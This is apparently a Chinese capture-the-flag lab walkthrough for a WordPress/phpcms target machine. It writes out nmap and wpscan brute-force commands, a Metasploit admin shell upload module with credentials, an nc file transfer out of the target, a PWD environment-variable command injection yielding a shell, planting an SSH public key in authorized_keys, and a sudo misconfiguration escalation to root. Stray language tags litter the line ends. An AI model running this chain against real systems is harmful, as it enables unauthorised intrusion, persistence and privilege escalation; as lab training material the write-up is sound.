首先 nmap 扫描端口javascript
nmap -p- -A 192.168.149.179php
有个 ftp 能够匿名登陆html
下下来看一下java
去扫一下python
http://192.168.149.179:65535/nginx
扫出来一个 phpcmsweb
这里有个验证密码才能看的,用以前 ftp 保存下来的密码试一下shell
wpscan --url http://192.168.149.179:65535/phpcms/ --enumerate
收集一下用户名bash
wpscan --url http://192.168.149.179:65535/phpcms/ -U user.txt -P pass.txt
爆破一下帐号密码微信
Username: maybeadmin
Password: $EPid%J2L9LufO5
而后登陆后台看一下,能够找到另外一组帐号密码
notadmin:Pa$$w0rd13!&
而后用 msf 链接一下
exploit/unix/webapp/wp_admin_shell_upload
设置如下参数
notadmin
Pa$$w0rd13!&
192.168.149.179
65535
/phpcms
python3 -c 'import pty; pty.spawn("/bin/bash")'
在 /home/doe目录下有一个 itseasy 文件,执行会返回当前路径
wsl:nc -lvp 10001 >itseasy
靶机:nc 192.168.149.1 10001 <itseasy
把这个文件给弄出来,IDA 打开看一下
C 库函数 char *getenv(const char *name) 搜索 name 所指向的环境字符串,并返回相关的值给字符串,在这里就是 PWD 所指向的,咱们能够改一下,从而得到一个 shell
其实是请求了 PWD(一个 web 靶机,用上了 IDA 我是没想到的)
export PWD=\$\(/bin/bash\)
而后再执行那个文件就能拿到 john 用户的 shell
如今有个问题是 ls,cat 之类的是不回显的,因此考虑一下把 ssh 的 authorized_keys 写成 wsl 的公钥,用 ssh 登上去(john 用户尚未 .ssh 文件夹,新建一个)
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyab46KTnUD6PBqNHweAB+SfDl36waT1RpkBUB3rcmP7QhRk4EOh0yShEmGCA2fev/A/9BY2LP2nd4EplGNYn14OgHONtXH74fSCqf0QZGMexQ9BkV5pHOTW+nGapxeaUTzyEkQQvDLnLm05Oqx6F9d5pfHIrbfQLBK7J0zY1BpkflT3I8pBzEdzLCWoG4Z62WGKQ0Q0ldm9NkRoEbZSOUxneazHiVa89mORtdtHXRr3nseLOyN17rJh6c2CF8ZtlLHIp12GOl0A6qm0eFW4KSJJvZCdxhX/p83hfCclFw7dckX1n+Q45GjuUF/ZE8IXmKRkwNDxOZalSgFjyYX+RlMr95Ruv8IaMk8tv5+Ut04cquKUgCn/9ksLRyL7+fJFok1EEupo4ZjTx3DlBNdkSch3IPT1XVgZeapqUik7jt5DgeGmGKBF93kE9pLO+2+3l1KntdeZ3abJHXDWzX6/mqRNtvMzdVik0jQGOjnGz1Yck0z9w8BK8BGtZ+917Kvns= 1097179511@qq.com" > authorized_keys
登陆成功,舒服了
另外他还藏了个密码,base64解码以后是:john:YZW$s8Y49IB#ZZJ
这时候 sudo -l 能够发现有个文件是能够不须要密码就能 sudo运行的
文件夹只有 www-data 帐户能够写入,因此仍是要回到 www-data 的 shell,写个 /bin/sh,而后 sudo 一执行就能拿到 root 权限的 shell
本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。